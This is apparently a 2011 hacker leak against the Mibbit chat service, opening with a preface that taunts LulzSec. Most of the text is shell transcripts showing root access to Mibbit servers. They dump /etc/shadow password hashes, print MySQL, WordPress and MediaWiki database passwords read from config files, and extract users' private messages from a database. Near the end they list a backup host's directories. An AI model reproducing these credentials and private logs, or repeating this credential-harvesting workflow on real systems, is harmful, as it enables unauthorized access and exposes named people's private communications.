+
+:: 0x01 - Preface :: 
+
+You may have read the about the various attention-whoring skid injections of LulzSec in the news lately, who hasn't? Apparently, anyone can pick up Havij, LFImap, or LOIC and make media headlines today. It seems they have succeeded in defacing the name of the anti-sec movement, turning it into a faux-revolutionary battle cry in the form of #antisec. However, anti-sec is not what it is being portrayed as. In actuality, anti-sec is the practice of keeping one's exploits and hacks to oneself for the good of everyone else (or personal profit, depending on who you ask). LulzSec, I would throw in a note here, but it seems I'm too late, most of you are already raided. To the rest, make your time.
+
+Not on the front page of the latest hacking busts and takedowns, the more skilled among us know not to broadcast our various 0wnages. We silently slip in and sift through large networks. Releases are private. Obviously, when you have a group that comes along such as Lulzsec, the question is not what they will get into, but how long they will last.
+
+More importantly, I would like to establish that the former Scene has very nearly disappeared since the rise of groups like Lulzsec. Blindly exploiting and staging large scale unjustified attacks against arbitrary organizations is not the mentality of hacking. Hacking is about curiousity. Hacking is about information. Attacking government entities so you can give the media your devoid justice statement is not hacking. It's called bullshit. I've seen enough garbage from Lulzsec releases.
+
+Today, we would like to provide the community with a special release, exclusively for all of the skidiots on Mibbit fueling Lulzsec/#antisec efforts. Enjoy.
+
+- HTP
+
+
+targ3t:
+
+ -                         _ _     _     _ _                 
+ -               _ __ ___ (_) |__ | |__ (_) |_
+ -              | '_ ` _ \| | '_ \| '_ \| | __|
+ -              | | | | | | | |_) | |_) | | |_
+ -              |_| |_| |_|_|_.__/|_.__/|_|\__|
+
+0wn3d:
+
+ -               Axod       Azander    Havvy
+ -               Hercule    Joshua     Kitsune
+ -               Molkmin    Pottsi     Sindacious
+
+
+:: 0x02 - 0wnage - tools.mibbit.com ::
+[h@ck ~]$ ssh root@tools.mibbit.com
+root@tools.mibbit.com's password: 
+Last login: Fri Aug 12 23:16:22 2011 from [redacted]
+root@tools:~# uname -a
+Linux tools.mibbit.com 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux
+root@tools:~# cat /etc/passwd /etc/shadow
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+syslog:x:101:103::/home/syslog:/bin/false
+ntp:x:102:104::/home/ntp:/bin/false
+sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
+wwwadmin:x:1000:1000::/home/wwwadmin:/bin/bash
+mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
+Debian-exim:x:105:107::/var/spool/exim4:/bin/false
+root:$1$6793e8d9$aGW9MH6RaZmSP4Tncpwrb1:14728:0:99999:7:::
+daemon:*:14728:0:99999:7:::
+bin:*:14728:0:99999:7:::
+sys:*:14728:0:99999:7:::
+sync:*:14728:0:99999:7:::
+games:*:14728:0:99999:7:::
+man:*:14728:0:99999:7:::
+lp:*:14728:0:99999:7:::
+mail:*:14728:0:99999:7:::
+news:*:14728:0:99999:7:::
+uucp:*:14728:0:99999:7:::
+proxy:*:14728:0:99999:7:::
+www-data:*:14728:0:99999:7:::
+backup:*:14728:0:99999:7:::
+list:*:14728:0:99999:7:::
+irc:*:14728:0:99999:7:::
+gnats:*:14728:0:99999:7:::
+nobody:*:14728:0:99999:7:::
+libuuid:!:14728:0:99999:7:::
+syslog:*:14728:0:99999:7:::
+ntp:*:14728:0:99999:7:::
+sshd:*:14728:0:99999:7:::
+wwwadmin:$6$.EejimbY$xKAXfpd3nBlNeoQ6pBWBqh673jW2ytSmL5WoUkXaRxadV/fUIM2nQcxm1mGzk1YI9t3yQH8XMzpzSHpNv1jb00:15048:0:99999:7:::
+mysql:!:15048:0:99999:7:::
+Debian-exim:!:15075:0:99999:7:::
+root@tools:~# ps aux | grep log
+root       201  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/0]
+root       202  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/1]
+root       203  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/2]
+root       204  0.0  0.0      0     0 ?        S    Mar15   0:00 [xfslogd/3]
+syslog    9019  0.0  0.2  21200  1288 ?        Sl   Mar15   1:35 rsyslogd -c4
+wwwadmin 18565  0.0  0.6   5056  3360 ?        S    Mar31  22:01 /home/wwwadmin/loggerbot/eggdrop ./logger1
+root@tools:~# ls -al /
+total 96
+drwxr-xr-x  22 root root  4096 Mar 15 22:22 .
+drwxr-xr-x  22 root root  4096 Mar 15 22:22 ..
+drwxrwxrwx  20 root root  4096 Aug  6 23:14 OLD_DATA
+drwxr-xr-x   2 root root  4096 Mar 15 12:19 bin
+drwxr-xr-x   2 root root  4096 Apr 29  2010 boot
+drwxr-xr-x  11 root root 13640 Mar 15 12:20 dev
+drwxr-xr-x  76 root root  4096 Aug 13 01:26 etc
+drwxr-xr-x   3 root root  4096 Mar 15 12:31 home
+drwxr-xr-x  17 root root 12288 Aug  9 00:38 lib
+drwx------   2 root root 16384 Apr 29  2010 lost+found
+drwxr-xr-x   2 root root  4096 Apr 29  2010 media
+drwxr-xr-x   2 root root  4096 Apr 23  2010 mnt
+drwxr-xr-x   2 root root  4096 Apr 29  2010 opt
+dr-xr-xr-x 117 root root     0 Mar 15 12:04 proc
+drwx------   4 root root  4096 Aug 13 02:32 root
+drwxr-xr-x   2 root root  4096 Mar 15 12:20 sbin
+drwxr-xr-x   2 root root  4096 Dec  5  2009 selinux
+drwxr-xr-x   2 root root  4096 Apr 29  2010 srv
+drwxr-xr-x  12 root root     0 Mar 15 12:04 sys
+drwxrwxrwt   4 root root  4096 Aug 12 08:40 tmp
+drwxr-xr-x  11 root root  4096 Aug  9 00:44 usr
+drwxr-xr-x  15 root root  4096 Aug  9 00:44 var
+root@tools:~# ls -al /home
+total 12
+drwxr-xr-x  3 root     root     4096 Mar 15 12:31 .
+drwxr-xr-x 22 root     root     4096 Mar 15 22:22 ..
+drwxr-xr-x  7 wwwadmin wwwadmin 4096 Aug 12 16:13 wwwadmin
+root@tools:~# ls -al /home/wwwadmin
+total 1076
+drwxr-xr-x  7 wwwadmin wwwadmin   4096 Aug 12 16:13 .
+drwxr-xr-x  3 root     root       4096 Mar 15 12:31 ..
+-rw-r--r--  1 wwwadmin wwwadmin   5014 Aug  7 20:51 .bash_history
+-rw-r--r--  1 wwwadmin wwwadmin    220 Apr 19  2010 .bash_logout
+-rw-r--r--  1 wwwadmin wwwadmin   3136 Aug  7 17:39 .bashrc
+drwx------  2 wwwadmin wwwadmin   4096 Mar 15 20:10 .cache
+-rw-r--r--  1 wwwadmin wwwadmin     19 Jan 29  2009 .hercpw
+-rw-r--r--  1 wwwadmin wwwadmin    148 Apr 11  2010 .htpasswd
+-rw-------  1 wwwadmin wwwadmin    177 Aug  6 15:34 .lesshst
+-rw-------  1 wwwadmin wwwadmin    214 Mar 16 20:20 .mysql_history
+-rw-------  1 wwwadmin wwwadmin     55 Mar 16 18:19 .php_history
+-rw-r--r--  1 wwwadmin wwwadmin    700 Mar 15 20:55 .profile
+-rw-r--r--  1 wwwadmin wwwadmin     66 Mar 31 16:37 .selected_editor
+drwx------  2 wwwadmin wwwadmin   4096 Mar 15 20:53 .ssh
+drwxr-xr-x  2 wwwadmin wwwadmin   4096 Mar 15 21:20 .vim
+-rw-------  1 wwwadmin wwwadmin  13346 Aug 12 16:13 .viminfo
+-rw-r--r--  1 wwwadmin wwwadmin   4425 Mar 15 20:53 .vimrc
+-rw-r--r--  1 wwwadmin wwwadmin 993262 Mar 31 14:46 eggdrop1.6.20.tar.bz2
+drwxr-xr-x  6 wwwadmin wwwadmin   4096 Apr 16 15:01 kenneth
+drwxr-xr-x 10 wwwadmin wwwadmin   4096 Aug 13 02:00 loggerbot
+-rw-r--r--  1 wwwadmin wwwadmin     45 Apr  5 20:40 test.php
+root@tools:~# ls -al /OLD_DATA
+total 132
+drwxrwxrwx 20 root root  4096 Aug  6 23:14 .
+drwxr-xr-x 22 root root  4096 Mar 15 22:22 ..
+drwxr-xr-x  2 root root  4096 Mar 15 10:46 bin
+drwxr-xr-x  2 root root  4096 Oct 20  2008 boot
+drwxr-xr-x  4 root root  8192 Mar 15 09:49 dev
+drwxr-xr-x 76 root root  4096 Mar 15 10:46 etc
+drwxr-xr-x  5 root root  4096 Jan 12  2009 home
+drwxr-xr-x 12 root root  8192 Mar 15 10:46 lib
+drwx------  2 root root 16384 Nov 25  2008 lost+found
+drwxr-xr-x  2 root root  4096 Nov 25  2008 media
+drwxr-xr-x  2 root root  4096 Oct 20  2008 mnt
+drwxr-xr-x  2 root root  4096 Nov 25  2008 opt
+drwxr-xr-x  2 root root  4096 Oct 20  2008 proc
+drwxr-xr-x  3 root root  4096 Mar  7 22:29 root
+drwxr-xr-x  2 root root  4096 Mar 15 10:46 sbin
+-rw-------  1 root root 31903 Jan 12  2009 sql0swW3A
+drwxr-xr-x  2 root root  4096 Nov 25  2008 srv
+drwxr-xr-x  2 root root  4096 Oct 14  2008 sys
+drwxrwxrwt  4 root root  4096 Mar 15 09:49 tmp
+drwxr-xr-x 11 root root  4096 Dec  9  2008 usr
+drwxr-xr-x 15 root root  4096 Dec 17  2008 var
+root@tools:~# ls -al /OLD_DATA/home
+total 20
+drwxr-xr-x  5 root     root     4096 Jan 12  2009 .
+drwxrwxrwx 20 root     root     4096 Aug  6 23:14 ..
+drwxr-xr-x 13     1001     1001 4096 Mar 15 10:46 ircadmin
+drwxr-xr-x  4 wwwadmin wwwadmin 4096 Oct 12  2009 mibbit
+drwxr-xr-x  8     1002     1002 4096 Mar 15 09:29 wwwadmin
+root@tools:~# ls -al /OLD_DATA/home/ircadmin/ # ALL YOUR IRCD ARE BELONG TO US
+total 146816
+drwxr-xr-x 13 1001 1001      4096 Mar 15 10:46 .
+drwxr-xr-x  5 root root      4096 Jan 12  2009 ..
+-rw-------  1 1001 1001     14707 Mar 14 23:29 .bash_history
+-rw-r--r--  1 1001 1001       220 May 12  2008 .bash_logout
+-rw-r--r--  1 1001 1001      3115 May 12  2008 .bashrc
+-rw-------  1 1001 1001        41 Jun  1  2010 .lesshst
+-rw-------  1 1001 1001       256 Mar 12 14:44 .nano_history
+-rw-r--r--  1 1001 1001       675 May 12  2008 .profile
+drwxr-xr-x  2 1001 1001      4096 Mar  7 23:44 .ssh
+-rw-------  1 1001 1001       821 May 21  2009 .viminfo
+drwxr-xr-x 13 1001 1001      4096 Jan  5  2010 Unreal3.2.7
+drwx------ 13 1001 1001      4096 Apr 13  2009 Unreal3.2.8
+drwx------ 13 1001 1001      4096 Dec 22  2010 Unreal3.2.8.1
+-rw-r--r--  1 1001 1001   8181760 Sep  9  2009 Unreal3.2.8.1.tar
+-rw-r--r--  1 1001 1001   8181760 Apr  7  2009 Unreal3.2.8.tar
+drwxr-xr-x  7 1001 1001      4096 Feb  3  2009 anope-1.8.0-rc1
+drwxr-xr-x  8 1001 1001      4096 Jan  7  2009 bopm
+drwxr-xr-x  5 1001 1001      4096 Jan  7  2009 bopm-3.1.3
+-rw-------  1 1001 1001      1475 Jul 30  2009 dead.letter
+drwxr-xr-x  2 1001 1001      8192 Mar 12 14:44 dronebl
+drwxr-xr-x  3 1001 1001      4096 May  4  2009 hub
+drwxr-xr-x  9 1001 1001      4096 Mar 15 10:46 infobot-0.45.3
+-rw-r--r--  1 1001 1001        81 Jan 26  2010 irc.us.mibbit.net.txt
+-rw-r--r--  1 1001 1001 132744770 Feb 28  2010 ircd.tgz
+-rw-r--r--  1 1001 1001       623 Oct 27  2009 jim
+-rw-------  1 1001 1001    949701 Feb  8  2010 mbox
+drwxr-xr-x  7 1001 1001      4096 Jan 26  2010 services
+
+:: 0x03 - PM logs - tools.mibbit.com ::
+
+root@tools:~# mysql -u root -ped4e5c6e88e5
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 95641
+Server version: 5.1.41-3ubuntu12.10 (Ubuntu)
+Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+mysql> use www;
+Reading table information for completion of table and column names
+You can turn off this feature to get a quicker startup with -A
+Database changed
+mysql> select concat(fromNick,' -> ',toNick,': ',data) from pmlogs;
+ 
+jared -> molkmin: can the admins tell when users PM each other on this network?
+jared -> molkmin: (with mibbit)
+molkmin -> jared: who do you wnat to know is saying what?
+jared -> molkmin: but they don't have to know that :)
+>>> karma motherfuck3r
+ 
+molkmin -> alpha: not that I can see 
+molkmin -> alpha: I wasn't watching 
+molkmin -> alpha: it hardly matters :) 
+alpha -> molkmin: just silenced them 
+alpha -> molkmin: :) 
+molkmin -> alpha: everyone in #chat is assholes :) 
+alpha -> molkmin: lol 
+alpha -> molkmin: thanks 
+>>> thX
+
+jared -> molkmin: i've seen some scary botnets on dalnet 
+jared -> molkmin: they could knock you off the server in less than a second 
+molkmin -> jared: I've never had that happen yet 
+molkmin -> jared: I have a mac 
+>>> ??
+
+jared -> molkmin: VNCing into a linux box 
+jared -> molkmin: with a windows virtualbox guest 
+jared -> molkmin: to use the VPN 
+jared -> molkmin: to connect to a terminal server at work 
+jared -> molkmin: friggin ridiculous 
+molkmin -> jared: get a freaking mac 
+jared -> molkmin: how would that help? 
+>>> ...
+
+[h@ck ~]$ wc mibbitpms.out 
+  51610  493903 2955301 mibbitpms.out
+[h@ck ~]$ wc mibbitchanmsgs.out 
+  622607  4558597 32539145 mibbitchanmsgs.out
+>>> f1les @ 0x07 <<<
+
+:: 0x04 - status.mibbit.com ::
+[h@ck ~]$ ssh wwwadmin@status.mibbit.com
+wwwadmin@status.mibbit.com's password: 
+Last login: Fri Aug 12 21:18:51 2011 from [redacted]
+wwwadmin@status:~$ cat /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
+syslog:x:102:103::/home/syslog:/bin/false
+klog:x:103:104::/home/klog:/bin/false
+mysql:x:104:105:MySQL Server,,,:/var/lib/mysql:/bin/false
+mibbit:x:1000:1000::/home/mibbit:/bin/bash
+wwwadmin:x:1001:1001::/home/wwwadmin:/bin/bash
+zfreebies:x:1002:1002::/home/zfreebies:/bin/bash
+smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
+smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
+jimmy:x:1003:1003::/home/jimmy:/bin/bash
+bind:x:107:109::/var/cache/bind:/bin/false
+wwwadmin@status:~$ ls -alt /
+total 92
+drwxrwxrwt  4 root root  4096 Aug 13 07:25 tmp
+drwxr-xr-x 78 root root  4096 Aug 13 01:14 etc
+drwxr-xr-x 21 root root  4096 Jul  7 07:40 .
+drwxr-xr-x 21 root root  4096 Jul  7 07:40 ..
+drwxr-xr-x 11 root root 12760 Jul  7 07:40 dev
+drwxr-xr-x 11 root root     0 Jul  7 07:40 sys
+dr-xr-xr-x 99 root root     0 Jul  7 07:40 proc
+drwxr-xr-x  2 root root  4096 May 29 23:11 bin
+drwxr-xr-x 15 root root 12288 May 29 23:11 lib
+drwx------  3 root root  4096 May 29 23:11 root
+drwxr-xr-x  2 root root  4096 Nov  6  2010 sbin
+drwxr-xr-x  6 root root  4096 Mar  4  2010 home
+drwxr-xr-x 11 root root  4096 Sep 30  2009 usr
+drwxr-xr-x 14 root root  4096 Aug 11  2009 var
+drwxr-xr-x  2 root root  4096 Apr 23  2009 media
+drwxr-xr-x  2 root root  4096 Apr 23  2009 opt
+drwxr-xr-x  2 root root  4096 Apr 23  2009 srv
+drwx------  2 root root 16384 Apr 23  2009 lost+found
+drwxr-xr-x  2 root root  4096 Apr 13  2009 boot
+drwxr-xr-x  2 root root  4096 Apr 13  2009 mnt
+drwxr-xr-x  2 root root  4096 Mar  6  2009 selinux
+wwwadmin@status:~$ ls -alt /home
+total 24
+drwxr-xr-x  6 wwwadmin  wwwadmin  4096 Aug 12 21:44 wwwadmin
+drwxr-xr-x 21 root      root      4096 Jul  7 07:40 ..
+drwxr-xr-x  7 mibbit    mibbit    4096 Jun 29 13:30 mibbit
+drwxr-xr-x  4 zfreebies zfreebies 4096 Apr 29  2010 zfreebies
+drwxr-xr-x  3 jimmy     jimmy     4096 Mar  8  2010 jimmy
+drwxr-xr-x  6 root      root      4096 Mar  4  2010 .
+wwwadmin@status:~$ ls -alt
+total 52
+drwxr-xr-x 6 wwwadmin wwwadmin 4096 Aug 12 21:44 .
+-rw------- 1 wwwadmin wwwadmin 1979 Aug 12 21:44 .mysql_history
+-rw------- 1 wwwadmin wwwadmin  120 Aug 12 05:15 .nano_history
+drwxrwxrwx 2 wwwadmin wwwadmin 4096 Aug  7 18:29 .ssh
+-rw------- 1 wwwadmin wwwadmin 6566 Aug  7 15:02 .bash_history
+drwxr-xr-x 3 wwwadmin wwwadmin 4096 Jan 26  2011 wiki_new
+drwxr-xr-x 4 wwwadmin wwwadmin 4096 Jan 25  2011 wiki_backup_25Jan
+lrwxrwxrwx 1 root     root       31 Jan 17  2011 blog -> /var/www/blog.mibbit.com/htdocs
+drwxr-xr-x 2 wwwadmin wwwadmin 4096 Dec 10  2010 WP_BACKUP
+drwxr-xr-x 6 root     root     4096 Mar  4  2010 ..
+lrwxrwxrwx 1 wwwadmin wwwadmin   32 Sep 13  2009 wiki -> /var/www/wiki.mibbit.com/htdocs/
+-rw-r--r-- 1 wwwadmin wwwadmin  220 Mar  2  2009 .bash_logout
+-rw-r--r-- 1 wwwadmin wwwadmin 3115 Mar  2  2009 .bashrc
+-rw-r--r-- 1 wwwadmin wwwadmin  675 Mar  2  2009 .profile
+wwwadmin@status:~$ ls -alt /var/www/
+total 56
+drwxr-xr-x  4 root     root     4096 May 12  2010 www.stopitmovies.com
+drwxr-xr-x 13 root     root     4096 May 12  2010 .
+drwxr-xr-x  4 root     root     4096 Mar 24  2010 status.mibbit.com
+drwxr-xr-x  4 root     root     4096 Mar 16  2010 a.mibbit.com
+drwxr-xr-x  6 root     root     4096 Feb 19  2010 blog.mibbit.com
+drwxr-xr-x  4 root     root     4096 Dec 23  2009 adminwiki.mibbit.com
+drwxr-xr-x  4 root     root     4096 Oct 12  2009 www.rollered.com
+drwxr-xr-x  4 root     root     4096 Oct 12  2009 www.wizzig.com
+drwxr-xr-x  4 www-data www-data 4096 Oct 12  2009 www.axod.net
+drwxr-xr-x  5 root     root     4096 Sep 30  2009 www.zfreebies.com
+drwxr-xr-x  5 root     root     4096 Sep 15  2009 forum.zfreebies.co.uk
+drwxrwxr-x  5 www-data www-data 4096 Sep 13  2009 wiki.mibbit.com
+-rw-r--r--  1 root     root       45 Aug 11  2009 index.html
+drwxr-xr-x 14 root     root     4096 Aug 11  2009 ..
+wwwadmin@status:~$ cat /var/www/a.mibbit.com/htdocs/admin/index.php | head -n 3
+<?
+	$sql = @mysql_connect("127.0.0.1", "advertuser", "e5e32f36aa88");
+	@mysql_select_db("adverts", $sql);
+wwwadmin@status:~$ cat /var/www/a.mibbit.com/htdocs/sessionError.php | head -n 3
+<?
+
+    $sql = @mysql_connect("127.0.0.1", "root", "5068c8055ffc");
+wwwadmin@status:~$ ls -alt /var/www/blog.mibbit.com/htdocs
+total 308
+drwxr-xr-x 5 wwwadmin wwwadmin  4096 Nov 15  2010 .
+-rw-r--r-- 1 wwwadmin www-data   655 Nov 15  2010 favicon.ico
+drwxr-xr-x 5 wwwadmin www-data  4096 Feb 23  2010 wp-content
+-rw-r--r-- 1 wwwadmin www-data  1548 Feb 19  2010 wp-config.php
+-rw-r--r-- 1 wwwadmin www-data 93445 Feb 19  2010 xmlrpc.php
+-rw-r--r-- 1 wwwadmin www-data 23097 Feb 19  2010 wp-settings.php
+-rw-r--r-- 1 wwwadmin www-data  3693 Feb 19  2010 wp-trackback.php
+-rw-r--r-- 1 wwwadmin www-data   218 Feb 19  2010 wp-rss.php
+-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-rss2.php
+-rw-r--r-- 1 wwwadmin www-data  7578 Feb 19  2010 wp-mail.php
+-rw-r--r-- 1 wwwadmin www-data   487 Feb 19  2010 wp-pass.php
+-rw-r--r-- 1 wwwadmin www-data   218 Feb 19  2010 wp-rdf.php
+-rw-r--r-- 1 wwwadmin www-data   316 Feb 19  2010 wp-register.php
+-rw-r--r-- 1 wwwadmin www-data  2341 Feb 19  2010 wp-load.php
+-rw-r--r-- 1 wwwadmin www-data 22721 Feb 19  2010 wp-login.php
+drwxr-xr-x 6 wwwadmin www-data  4096 Feb 19  2010 wp-includes
+-rw-r--r-- 1 wwwadmin www-data  1946 Feb 19  2010 wp-links-opml.php
+-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-feed.php
+-rw-r--r-- 1 wwwadmin www-data  1253 Feb 19  2010 wp-cron.php
+-rw-r--r-- 1 wwwadmin www-data   238 Feb 19  2010 wp-commentsrss2.php
+-rw-r--r-- 1 wwwadmin www-data  2616 Feb 19  2010 wp-config-sample.php
+-rw-r--r-- 1 wwwadmin www-data 40400 Feb 19  2010 wp-app.php
+-rw-r--r-- 1 wwwadmin www-data   220 Feb 19  2010 wp-atom.php
+-rw-r--r-- 1 wwwadmin www-data   274 Feb 19  2010 wp-blog-header.php
+-rw-r--r-- 1 wwwadmin www-data  3928 Feb 19  2010 wp-comments-post.php
+drwxr-xr-x 8 wwwadmin www-data  4096 Feb 19  2010 wp-admin
+-rw-r--r-- 1 wwwadmin www-data 15410 Feb 19  2010 license.txt
+-rw-r--r-- 1 wwwadmin www-data  7644 Feb 19  2010 readme.html
+-rw-r--r-- 1 wwwadmin www-data   397 Feb 19  2010 index.php
+drwxr-xr-x 6 root     root      4096 Feb 19  2010 ..
+wwwadmin@status:~$ cat /var/www/blog.mibbit.com/htdocs/wp-config.php | head -n 8
+<?php
+// ** MySQL settings ** //
+define('DB_NAME', 'wpblog');    // The name of the database
+define('DB_USER', 'wpuser');     // Your MySQL username
+define('DB_PASSWORD', '13c3cada3921'); // ...and password
+define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value
+define('DB_CHARSET', 'utf8');
+define('DB_COLLATE', '');
+wwwadmin@status:~$ ls -alt /var/www/wiki.mibbit.com/htdocs/
+total 720
+-rw-rw-r--  1 www-data www-data   6960 Mar 21 12:46 LocalSettings.php
+drwxrwxr-x  9 www-data www-data   4096 Mar 21 12:41 extensions
+drwxr-xr-x  2 wwwadmin wwwadmin   4096 Jan 26  2011 SpamBlacklist
+drwxrwxr-x 17 www-data www-data   4096 Jan 26  2011 .
+drwxrwxr-x 22 www-data www-data   4096 Jan 26  2011 images
+drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 bin
+drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 config
+drwxrwxr-x  4 www-data www-data   4096 Jan 26  2011 docs
+drwxrwxr-x 17 www-data www-data   4096 Jan 26  2011 includes
+drwxrwxr-x  4 www-data www-data   4096 Jan 26  2011 languages
+drwxrwxr-x 13 www-data www-data  12288 Jan 26  2011 maintenance
+drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 math
+drwxrwxr-x  2 www-data www-data   4096 Jan 26  2011 serialized
+drwxrwxr-x 10 www-data www-data   4096 Jan 26  2011 skins
+drwxr-xr-x  2 wwwadmin wwwadmin   4096 Jan  4  2011 cache
+-rw-r--r--  1 wwwadmin wwwadmin  59433 Jan  4  2011 RELEASE-NOTES
+-rw-r--r--  1 wwwadmin wwwadmin   2090 Jan  4  2011 CREDITS
+-rw-r--r--  1 wwwadmin wwwadmin   8821 Jan  4  2011 profileinfo.php
+-rw-rw-r--  1 root     root        655 Nov 15  2010 favicon.ico
+-rw-r--r--  1 wwwadmin wwwadmin  13307 Mar 25  2010 UPGRADE
+-rw-r--r--  1 wwwadmin wwwadmin 392287 Mar 12  2010 HISTORY
+-rw-r--r--  1 wwwadmin wwwadmin   4905 Mar  8  2010 thumb.php
+-rw-r--r--  1 wwwadmin wwwadmin   4707 Feb 15  2010 api.php
+-rw-r--r--  1 wwwadmin wwwadmin    174 Feb  3  2010 php5.php5
+-rw-r--r--  1 wwwadmin wwwadmin     89 Feb  3  2010 redirect.phtml
+-rw-r--r--  1 wwwadmin wwwadmin     86 Feb  3  2010 wiki.phtml
+-rw-r--r--  1 wwwadmin wwwadmin   4329 Jan  1  2010 index.php
+-rw-r--r--  1 wwwadmin wwwadmin   4031 Oct 14  2009 img_auth.php
+-rw-rw-r--  1 www-data www-data   9416 Sep 13  2009 mibbit.png
+-rw-rw-r--  1 www-data www-data   1049 Sep 13  2009 AdminSettings.php
+drwxrwxr-x  5 www-data www-data   4096 Sep 13  2009 ..
+-rw-r--r--  1 wwwadmin wwwadmin     76 Jul 27  2009 FAQ
+drwxrwxr-x  4 www-data www-data   4096 Jul 13  2009 t
+drwxrwxr-x  2 www-data www-data   4096 Jul 13  2009 tests
+-rw-r--r--  1 wwwadmin wwwadmin    648 May  7  2009 StartProfiler.sample
+-rw-rw-r--  1 www-data www-data   3952 Mar 21  2009 install-utils.inc
+-rw-r--r--  1 wwwadmin wwwadmin   3054 Mar 21  2009 opensearch_desc.php
+-rw-r--r--  1 wwwadmin wwwadmin    383 Mar 21  2009 redirect.php
+-rw-r--r--  1 wwwadmin wwwadmin     32 Mar 16  2009 trackback.php5
+-rw-rw-r--  1 www-data www-data    603 Jan  7  2009 StartProfiler.php
+-rw-r--r--  1 wwwadmin wwwadmin   3649 Nov 11  2008 README
+-rw-r--r--  1 wwwadmin wwwadmin   1347 Nov  5  2008 trackback.php
+-rw-r--r--  1 wwwadmin wwwadmin   4138 Apr 18  2008 INSTALL
+-rw-rw-r--  1 www-data www-data    618 Apr 11  2008 Makefile
+-rw-r--r--  1 wwwadmin wwwadmin     39 Mar  3  2008 opensearch_desc.php5
+-rw-r--r--  1 wwwadmin wwwadmin     25 Feb  4  2008 api.php5
+-rw-r--r--  1 wwwadmin wwwadmin     31 Feb  4  2008 img_auth.php5
+-rw-r--r--  1 wwwadmin wwwadmin     28 Feb  4  2008 index.php5
+-rw-r--r--  1 wwwadmin wwwadmin     31 Feb  4  2008 redirect.php5
+-rw-r--r--  1 wwwadmin wwwadmin     29 Feb  4  2008 thumb.php5
+-rw-r--r--  1 wwwadmin wwwadmin  17997 Apr  5  2006 COPYING
+wwwadmin@status:~$ cat /var/www/wiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
+
+$wgDBtype           = "mysql";
+$wgDBserver         = "localhost";
+$wgDBname           = "wikidb";
+$wgDBuser           = "wikiuser";
+$wgDBpassword       = "a69e74574db6";
+$wgDBport           = "5432";
+$wgDBprefix         = "";
+$wgDBadminuser      = "wikiuser";
+$wgDBadminpassword  = "a69e74574db6";
+
+# Schemas for Postgres
+$wgDBmwschema       = "mediawiki";
+$wgDBts2schema      = "public";
+wwwadmin@status:~$ cat /var/www/adminwiki.mibbit.com/htdocs/LocalSettings.php | grep "password" -C 5
+## Database settings
+$wgDBtype           = "mysql";
+$wgDBserver         = "localhost";
+$wgDBname           = "wikiadmindb";
+$wgDBuser           = "wikiadminuser";
+$wgDBpassword       = "fe102b0d7793";
+
+# MySQL specific settings
+$wgDBprefix         = "";
+
+# MySQL table options to use during installation or update
+wwwadmin@status:~$ exit
+Connection to status.mibbit.com closed.
+
+
+:: 0x05 - sidewinder.netonecom.net ::
+backup@sidewinder ~> ls -al # read world backups of all servers with /etc/shadow ROFL
+total 596
+drwxr-xr-x 16 backup root     432 2011-08-12 18:52 .
+drwxr-xr-x 26 root   root     632 2011-05-12 14:12 ..
+drwxr-xr-x  2 backup users   1344 2009-08-27 10:44 amram
+drwxr-xr-x  2 root   root  587920 2011-08-13 12:37 awstats
+-rw-------  1 backup  1452     17 2006-09-18 14:47 .bash_history
+drwxr-xr-x  2 backup users    224 2009-10-07 12:58 hornet
+drwxr-xr-x  2 backup users   1336 2010-08-24 11:23 ice
+drwxr-xr-x  2 backup users   1216 2010-11-12 16:07 janco
